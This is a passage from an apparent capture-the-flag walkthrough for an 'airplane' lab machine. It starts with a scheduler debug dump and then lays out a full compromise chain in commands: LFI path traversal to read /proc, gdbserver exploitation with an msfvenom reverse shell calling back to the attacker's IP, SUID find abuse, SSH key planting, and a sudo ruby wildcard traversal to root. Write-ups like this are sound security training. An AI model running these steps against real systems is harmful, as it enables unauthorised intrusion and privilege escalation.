.rt_runtime : 950.000000
dl_rq[1]:
.dl_nr_running : 0
.dl_nr_migratory : 0
.dl_bw->bw : 996147
.dl_bw->total_bw : 0
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd 1 537.273494 2350 120 0.000000 859.165562 0.000000 0 0 /autogroup-2
S kthreadd 2 14984.839338 151 120 0.000000 4.802150 0.000000 0 0 /
I rcu_sched 10 17525.908859 11330 120 0.000000 131.406498 0.000000 0 0 /
S cpuhp/1 15 949.558725 11 120 0.000000 0.213851 0.000000 0 0 /
S idle_inject/1 16 -3.000000 3 49 0.000000 0.000000 0.000000 0 0 /
S migration/1 17 37.019061 271 0 0.000000 3.809587 0.000000 0 0 /
S ksoftirqd/1 18 17524.158281 696 120 0.000000 44.243722 0.000000 0 0 /
I kworker/1:0H 20 709.399861 5 100 0.000000 0.032308 0.000000 0 0 /
S kdevtmpfs 21 4698.593452 174 120 0.000000 3.691691 0.000000 0 0 /
I netns 22 4.951421 2 100 0.000000 0.000000 0.000000 0 0 /
Srcu_tasks_kthre 23 2.958667 2 120 0.000000 0.007244 0.000000 0 0 /
S kauditd 24 7533.989746 23 120 0.000000 0.539318 0.000000 0 0 /
I kworker/1:1 25 15014.225783 583 120 0.000000 29.198933 0.000000 0 0 /
S khungtaskd 26 17406.420670 7 120 0.000000 0.259229 0.000000 0 0 /
S kcompactd0 29 14.958661 2 120 0.000000 0.000000 0.000000 0 0 /
S khugepaged 31 14.958661 2 139 0.000000 0.000000 0.000000 0 0 /
I kblockd 78 20.979452 2 100 0.000000 0.000000 0.000000 0 0 /
I tpm_dev_wq 80 60.960859 2 100 0.000000 0.006523 0.000000 0 0 /
I md 82 66.960856 2 100 0.000000 0.000000 0.000000 0 0 /
I devfreq_wq 84 66.960856 2 100 0.000000 0.000000 0.000000 0 0 /
S kswapd0 88 210.839317 3 120 0.000000 0.022832 0.000000 0 0 /
Secryptfs-kthrea 89 174.713319 2 120 0.000000 0.014811 0.000000 0 0 /
I kthrotld 91 186.754519 2 100 0.000000 0.014095 0.000000 0 0 /
I ipv6_addrconf 94 227.065585 2 100 0.000000 0.025127 0.000000 0 0 /
I kworker/u5:0 106 247.930495 2 100 0.000000 0.012630 0.000000 0 0 /
I nvme-wq 154 482.722329 2 100 0.000000 0.011813 0.000000 0 0 /
I ena 155 487.385448 2 100 0.000000 0.020031 0.000000 0 0 /
I nvme-reset-wq 156 492.844671 2 100 0.000000 0.017892 0.000000 0 0 /
I nvme-delete-wq 157 499.654263 2 100 0.000000 0.005614 0.000000 0 0 /
Sjbd2/nvme0n1p5- 181 17525.060853 13317 120 0.000000 392.987924 0.000000 0 0 /
I kworker/1:1H 194 17524.980428 291 100 0.000000 2.365119 0.000000 0 0 /
Ssystemd-journal 223 99.302072 1153 119 0.000000 266.193735 0.000000 0 0 /autogroup-3
I kworker/1:3 241 15014.188993 1522 120 0.000000 40.560353 0.000000 0 0 /
S loop1 265 7478.823442 88 100 0.000000 1.578729 0.000000 0 0 /
S loop4 268 7478.825162 84 100 0.000000 1.045874 0.000000 0 0 /
Ssystemd-network 292 65.517126 101 120 0.000000 69.584368 0.000000 0 0 /autogroup-27
S sd-resolve 301 9.288157 16 120 0.000000 2.727973 0.000000 0 0 /autogroup-30
S gdbus 482 22.249785 139 120 0.000000 10.277133 0.000000 0 0 /autogroup-35
S acpid 367 0.730278 16 120 0.000000 3.419987 0.000000 0 0 /autogroup-39
S anacron 368 399.643480 15 120 0.000000 4.206220 0.000000 0 0 /autogroup-36
S avahi-daemon 370 11.235924 261 120 0.000000 27.676736 0.000000 0 0 /autogroup-38
S NetworkManager 376 27.763274 481 120 0.000000 56.933748 0.000000 0 0 /autogroup-43
S irqbalance 383 6.756058 74 120 0.000000 24.759695 0.000000 0 0 /autogroup-48
S gmain 413 1.209262 1 120 0.000000 0.048343 0.000000 0 0 /autogroup-48
Snetworkd-dispat 385 67.180817 306 120 0.000000 113.420676 0.000000 0 0 /autogroup-49
S gmain 434 0.010884 2 120 0.000000 0.038980 0.000000 0 0 /autogroup-52
S rsyslogd 388 9.716708 33 120 0.000000 7.026272 0.000000 0 0 /autogroup-50
S snapd 390 18.949459 238 120 0.000000 29.738045 0.000000 0 0 /autogroup-55
S snapd 488 13.035884 51 120 0.000000 1.543868 0.000000 0 0 /autogroup-55
S snapd 489 13.002454 3 120 0.000000 0.114835 0.000000 0 0 /autogroup-55
S snapd 623 3902.615575 7307 120 0.000000 2116.799904 0.000000 0 0 /autogroup-55
S snapd 1004 3852.665994 6527 120 0.000000 2155.894714 0.000000 0 0 /autogroup-55
Sswitcheroo-cont 391 6.371254 46 120 0.000000 16.118601 0.000000 0 0 /autogroup-54
S gmain 430 5.380134 1 120 0.000000 0.043780 0.000000 0 0 /autogroup-54
S gdbus 481 12.314453 14 120 0.000000 0.703130 0.000000 0 0 /autogroup-54
S systemd-logind 395 31.517685 934 120 0.000000 117.482963 0.000000 0 0 /autogroup-57
S gdbus 484 16.555120 57 120 0.000000 3.928079 0.000000 0 0 /autogroup-56
S probing-thread 527 14.087137 4 120 0.000000 0.082630 0.000000 0 0 /autogroup-56
S cupsd 473 10.929448 72 120 0.000000 16.159782 0.000000 0 0 /autogroup-67
S cups-browsed 485 10.060922 216 120 0.000000 27.970460 0.000000 0 0 /autogroup-69
S gmain 521 2.605798 1 120 0.000000 0.040173 0.000000 0 0 /autogroup-69
S gdbus 522 7.039665 41 120 0.000000 5.304445 0.000000 0 0 /autogroup-69
S python3 532 200.684759 1597 120 0.000000 302.964948 0.000000 0 0 /autogroup-75
Sunattended-upgr 536 74.051800 218 120 0.000000 96.935569 0.000000 0 0 /autogroup-77
S gmain 621 75.722099 1 120 0.000000 0.029839 0.000000 0 0 /autogroup-77
S sshd 552 9.479976 9 120 0.000000 11.746325 0.000000 0 0 /autogroup-80
Samazon-ssm-agen 553 25.588294 244 120 0.000000 29.271736 0.000000 0 0 /autogroup-81
Samazon-ssm-agen 601 10.365611 32 120 0.000000 0.565753 0.000000 0 0 /autogroup-81
Samazon-ssm-agen 602 19.907144 18 120 0.000000 4.026165 0.000000 0 0 /autogroup-81
Samazon-ssm-agen 603 21.117699 47 120 0.000000 3.266141 0.000000 0 0 /autogroup-81
Samazon-ssm-agen 604 19.855548 2 120 0.000000 0.085098 0.000000 0 0 /autogroup-81
Samazon-ssm-agen 624 44.390512 174 120 0.000000 15.582552 0.000000 0 0 /autogroup-81
Samazon-ssm-agen 625 43.679397 237 120 0.000000 14.789134 0.000000 0 0 /autogroup-81
I kworker/1:5 556 17526.046283 1708 120 0.000000 35.342229 0.000000 0 0 /
S gmain 572 2.302931 2 120 0.000000 0.127739 0.000000 0 0 /autogroup-84
S kerneloops 563 2.882907 18 120 0.000000 4.390081 0.000000 0 0 /autogroup-87
S kerneloops 565 1.309372 17 120 0.000000 5.467969 0.000000 0 0 /autogroup-89
t airplane 569 8.352077 6 120 0.000000 1.493160 0.000000 0 0 /autogroup-74
S gmain 656 54.205485 3 120 0.000000 0.147337 0.000000 0 0 /autogroup-95
S systemd 665 12.808756 106 120 0.000000 84.281211 0.000000 0 0 /autogroup-98
S (sd-pam) 666 2.382076 1 120 0.000000 0.255692 0.000000 0 0 /autogroup-98
S dbus-daemon 674 8.648518 101 120 0.000000 11.644721 0.000000 0 0 /autogroup-102
S rtkit-daemon 679 6.291148 31 121 0.000000 6.508985 0.000000 0 0 /autogroup-103
S rtkit-daemon 681 0.000000 88 0 0.000000 1.925818 0.000000 0 0 /autogroup-103
Sgdm-session-wor 711 60.250730 118 120 0.000000 15.312143 0.000000 0 0 /autogroup-95
S gmain 713 54.498284 5 120 0.000000 0.125817 0.000000 0 0 /autogroup-95
S InputThread 737 74.937758 4 120 0.000000 0.137840 0.000000 0 0 /autogroup-105
S dbus-daemon 741 2447.123408 811 120 0.000000 84.505766 0.000000 0 0 /autogroup-105
Sgnome-session-b 742 2440.524676 218 120 0.000000 49.776167 0.000000 0 0 /autogroup-105
S gdbus 764 2440.615243 385 120 0.000000 26.849419 0.000000 0 0 /autogroup-105
Sat-spi-bus-laun 745 245.115815 34 120 0.000000 5.221875 0.000000 0 0 /autogroup-105
S gmain 746 95.522980 2 120 0.000000 0.080964 0.000000 0 0 /autogroup-105
S dconf worker 747 102.551490 10 120 0.000000 1.028514 0.000000 0 0 /autogroup-105
S gdbus 749 245.415845 26 120 0.000000 1.825463 0.000000 0 0 /autogroup-105
S gnome-shell 782 2477.017748 4977 120 0.000000 2296.556864 0.000000 0 0 /autogroup-105
S gdbus 787 2447.218177 819 120 0.000000 58.263072 0.000000 0 0 /autogroup-105
S llvmpipe-1 791 2470.925577 769 120 0.000000 675.515767 0.000000 0 0 /autogroup-105
S gnome-shell 792 292.549162 1 120 0.000000 0.020753 0.000000 0 0 /autogroup-105
S gnome-shell 793 304.540428 1 120 0.000000 0.053863 0.000000 0 0 /autogroup-105
S gnome-s:disk$0 794 1668.046363 19 139 0.000000 4.254597 0.000000 0 0 /autogroup-105
S gmain 812 669.178217 3 120 0.000000 0.271988 0.000000 0 0 /autogroup-105
S gmain 818 684.211867 1 120 0.000000 0.047456 0.000000 0 0 /autogroup-105
S ibus-x11 817 1710.261956 117 120 0.000000 28.098516 0.000000 0 0 /autogroup-105
S gdbus 825 707.760876 2 120 0.000000 0.143083 0.000000 0 0 /autogroup-105
S gmain 830 746.170508 2 120 0.000000 0.068172 0.000000 0 0 /autogroup-105
S gmain 828 728.449731 1 120 0.000000 0.053425 0.000000 0 0 /autogroup-105
S gdbus 829 1293.811322 42 120 0.000000 3.598901 0.000000 0 0 /autogroup-105
Sxdg-permission- 834 1229.402935 20 120 0.000000 6.262062 0.000000 0 0 /autogroup-105
S gdbus 837 1229.225627 23 120 0.000000 1.555898 0.000000 0 0 /autogroup-105
S pulseaudio 842 3.873497 84 109 0.000000 48.211883 0.000000 0 0 /autogroup-110
S null-sink 843 0.000000 20 94 0.000000 0.667607 0.000000 0 0 /autogroup-110
S snapd-glib 844 3.788302 1 120 0.000000 0.136552 0.000000 0 0 /autogroup-110
S JS Helper 861 1738.934353 16 120 0.000000 2.121665 0.000000 0 0 /autogroup-105
S JS Helper 862 1739.440298 9 120 0.000000 2.534715 0.000000 0 0 /autogroup-105
S gmain 863 1155.784364 1 120 0.000000 0.051073 0.000000 0 0 /autogroup-105
S gdbus 864 1210.818127 18 120 0.000000 1.848280 0.000000 0 0 /autogroup-105
S gmain 907 1250.545843 1 120 0.000000 0.033569 0.000000 0 0 /autogroup-105
S gsd-wacom 869 1737.272560 202 120 0.000000 40.963231 0.000000 0 0 /autogroup-105
S gmain 927 1271.201773 2 120 0.000000 0.060739 0.000000 0 0 /autogroup-105
S gdbus 968 1293.111429 34 120 0.000000 1.922080 0.000000 0 0 /autogroup-105
S gsd-color 871 2469.967462 373 120 0.000000 38.750066 0.000000 0 0 /autogroup-105
S gdbus 947 2446.986934 185 120 0.000000 13.477612 0.000000 0 0 /autogroup-105
S gsd-keyboard 872 1737.288195 205 120 0.000000 27.573433 0.000000 0 0 /autogroup-105
S gmain 928 1255.390821 1 120 0.000000 0.046543 0.000000 0 0 /autogroup-105
S gdbus 934 1737.336962 103 120 0.000000 5.055173 0.000000 0 0 /autogroup-105
Sgsd-print-notif 873 1293.039330 86 120 0.000000 13.187106 0.000000 0 0 /autogroup-105
S gdbus 911 1293.105662 54 120 0.000000 3.657100 0.000000 0 0 /autogroup-105
S gmain 893 1242.598002 1 120 0.000000 0.031651 0.000000 0 0 /autogroup-105
Spool-gsd-smartc 905 1254.487901 3 120 0.000000 0.132032 0.000000 0 0 /autogroup-105
S dconf worker 906 1250.678952 2 120 0.000000 0.166677 0.000000 0 0 /autogroup-105
S dconf worker 956 1271.045566 2 120 0.000000 0.143373 0.000000 0 0 /autogroup-105
S gsd-media-keys 877 1769.329104 232 120 0.000000 39.759048 0.000000 0 0 /autogroup-105
S dconf worker 948 1268.656120 6 120 0.000000 0.407456 0.000000 0 0 /autogroup-105
Sgsd-screensaver 879 1293.037631 51 120 0.000000 7.014632 0.000000 0 0 /autogroup-105
S gdbus 903 1293.118100 49 120 0.000000 3.635045 0.000000 0 0 /autogroup-105
S gsd-sound 881 1293.037772 52 120 0.000000 10.824817 0.000000 0 0 /autogroup-105
S gmain 897 1244.524906 2 120 0.000000 0.056686 0.000000 0 0 /autogroup-105
S gdbus 899 1293.116441 49 120 0.000000 3.841359 0.000000 0 0 /autogroup-105
S dconf worker 913 1248.037070 7 120 0.000000 0.153213 0.000000 0 0 /autogroup-105
S gmain 889 1239.634513 2 120 0.000000 0.068539 0.000000 0 0 /autogroup-105
S gdbus 902 1293.102228 67 120 0.000000 3.351349 0.000000 0 0 /autogroup-105
S dconf worker 910 1737.229500 8 120 0.000000 0.313753 0.000000 0 0 /autogroup-105
S gsd-power 888 2457.769762 216 120 0.000000 34.972179 0.000000 0 0 /autogroup-105
S gdbus 935 2447.212700 123 120 0.000000 9.418665 0.000000 0 0 /autogroup-105
S dconf worker 942 1264.351468 2 120 0.000000 0.266798 0.000000 0 0 /autogroup-105
S gmain 961 1273.202341 1 120 0.000000 0.049129 0.000000 0 0 /autogroup-105
S gmain 972 146.977017 3 120 0.000000 0.105909 0.000000 0 0 /autogroup-114
Ssystemd-timedat 1007 174.555389 2220 120 0.000000 281.078772 0.000000 0 0 /autogroup-116
I kworker/u4:1 1159 17525.820074 101 120 0.000000 2.671951 0.000000 0 0 /
Supdate-notifier 1187 401.004846 4 120 0.000000 0.313600 0.000000 0 0 /autogroup-36The file contents has a section labeled runnable tasks which lists all the tasks (processes or threads) that are considered runnable by the scheduler. The S column shows the Process status (S: Sleeping, R: Running, I: Idle).
Extracting information from these processes (PIDs):
We can try to fetch the command line arguments for the various processes by substituting the PIDs within: /proc/[pid]/cmdline. Manually doing so is practically not possible as we have lots of processes based on the sched_debug file content. Writing a script is what would help.
The script:
This is a simple script written in bash:
curl "http://airplane.thm:8000/?page=../../../../../../proc/sched_debug" | awk '/^runnable tasks:/,/^$/ {if ($3 ~ /^[0-9]+$/) print $3}' | while IFS= read -r pid; do
echo "PID $pid cmdline:"
curl --output - "http://airplane.thm:8000/?page=../../../../../../proc/$pid/cmdline"
echo -e "\n--------------------------------------------------"
doneExplanation:
This fetches the contents of the sched_debug file:
curl "http://airplane.thm:8000/?page=../../../../../../proc/sched_debug"/^runnable tasks:/,/^$/: This part tells awk to look for lines starting with runnable tasks: and continue until it finds an empty line.
{if ($3 ~ /^[0-9]+$/) print $3}: Inside the runnable tasks section, it checks if the third column ($3) is a number (PID) and then it prints that number:
| awk '/^runnable tasks:/,/^$/ {if ($3 ~ /^[0-9]+$/) print $3}'This takes each PID found by awk and loops through them:
| while IFS= read -r pid; doFor each PID, it then fetches and display its cmdline:
echo "PID $pid cmdline:"
curl --output - "http://airplane.thm:8000/?page=../../../../../../proc/$pid/cmdline"
echo -e "\n--------------------------------------------------"
doneRunning the script:
We then come across this cmdline that stands out:
/usr/bin/gdbserver0.0.0.0:6048airplane
Finally we now know what exactly is running on port 6048. It is gdbserver. This is a tool that enables the debugging of programs remotely.
Based on the command gdbserver is listening on all network interfaces (0.0.0.0) on port 6048 and the executable program that gdbserver is said to debug is airplane.
This executable can also be found running as a process:
This binary can be downloaded via LFI as we have it's location, and it can be run:
Command:
curl --output airplane http://airplane.thm:8000/\?page\=../../../../opt/airplane
Nothing interesting could be found post reverse engineering it. Let us go back to check out the gdbserver and find ways to exploit it.
Metasploit Exploit:
We have to set the RHOSTS, RPORT, LPORT and the target architecture, on which the payload will be based.
First up, we have to find the target machine's arch. We can do the same by fetching the /proc/version file:
Command:
curl --output - http://airplane.thm:8000/\?page\=../../../../proc/versionThis file specifies the version of the Linux kernel, the version of gcc used to compile the kernel, and the time of kernel compilation.
It says amd64, so it is a 64-bit machine. The target can be now set to x86_64 (Id - 1).
Setting up the options:
Running the exploit:
We have got a shell as the user hudson. The same can be done without using Metasploit too.
Exploitation w/o Metasploit:
Commands:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.11.75.84 LPORT=5555 PrependFork=true -f elf -o binary.elf //The IP here is the tun0 interface IP
Now set up a listener on port 5555:
chmod +x binary.elfgdb binary.elf //If gdb isn't installed, type in: apt install gdb -ytarget extended-remote airplane.thm:6048
remote put binary.elf /tmp/binary.elf
set remote exec-file /tmp/binary.elf
runWe can place the binary in the /tmp directory as it is universally writeable:
The moment we type in run, we can see we have got a connection on the listener on port 5555:
Now we can upgrade the shell a little by running this:
Commands:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xtermThe user flag is within carlos's home directory:
Command:
find / -name user.txt 2> /dev/null
So now we have to laterally move to carlos from hudson, unless we directly get to root.
Enumeration:
Checking for binaries that have the SUID bit set:
Command:
find / -perm -u=s -type f 2>/dev/null
The find binary has the SUID bit set. Files which have SUID permissions run with higher privileges.
Searching in GTFOBins:
Command:
find . -exec /bin/sh -p \; -quit
The EUID (Effective User ID) bit is now set to carlos. This means that the shell that we got has the effective permissions and privileges associated with the user carlos, but the shell session itself is running as the user hudson. So the shell is still in the context of hudson.
The user flag can be found it carlos's home directory:
We can now generate a ssh key pair and the public key can be placed on the target machine inside the /.ssh directory within carlos's home directory as authorized_keys:
Command:
ssh-keygen -t rsa
Now we can SSH in as carlos:
Command:
ssh carlos@airplane.thm
Now we have a full fledged shell as carlos.
Privilege Escalation:
We can now check for carlos's sudo rights/privs:
This command: /usr/bin/ruby /root/*.rb can be run as any user without us being prompted to enter a password. By making use of that command we would be able to get to root.
The security risk:
The problem here is, the command: /usr/bin/ruby /root/*.rb has a wildcard character (*) in the path argument and this command can be run by us with sudo rights, basically with elevated privs. * matches any character (including whitespaces), so we can modify the path as needed via a simple path traversal. We can get a root shell this way.
Command:
echo '`chmod u+s /bin/bash`' > shell.rbThe file when run with elevated privs, will set the SUID bit on the bash binary.
The command can be run within carlos's home directory as we as carlos will have write permissions on it:
Getting a root shell:
Command:
sudo /usr/bin/ruby /root/../../home/carlos/shell.rb
Now let us check out the bash binary:
The SUID bit has been indeed set.
Now we can just type in this to get a root shell:
Command:
bash -pWhen bash is invoked with the -p option, it starts in privileged mode. Normally, when bash starts, it drops certain privileges for security reasons. The -p flag prevents bash from doing this.
We are root.
A simpler way to do the same would be directly spawning a bash shell, like so:
Now we can fetch the root flag from the /root directory.
Room solved!!
Last updated